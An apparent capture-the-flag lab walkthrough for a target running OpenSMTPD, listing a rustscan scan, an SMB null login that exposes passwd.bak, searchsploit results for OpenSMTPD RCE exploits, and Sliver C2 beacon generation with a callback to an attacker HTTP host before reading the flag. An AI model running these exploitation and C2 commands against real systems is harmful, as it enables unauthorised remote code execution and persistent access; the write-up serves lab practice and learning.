Enumeration
Network scanning
rustscan -a 192.168.179.71 --ulimit 5000 -- -Pn -sV --script \"'vuln'\" -oA bratarinaOutput
Open 192.168.179.71:22
Open 192.168.179.71:25
Open 192.168.179.71:80
Open 192.168.179.71:445Port 80
No useful information found.
Port 445
Null login allowed which gives us a passwd.bak
Port 25
➜ searchsploit opensmtpd
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit) | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48140.c
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsDownloading the exploit
searchsploit -m linux/remote/47984.py
Exploitation
Sliver C2
beacon generation
generate beacon --http http://192.168.45.239 --os linux --save .beacon listener
httpUsing a beacon
use beacon-name
making it interactive
interactive
starting a session
sessions -i e383a747
Flag
cat flag.txt
47b47f3f1b76d3d3aa699676199c6f27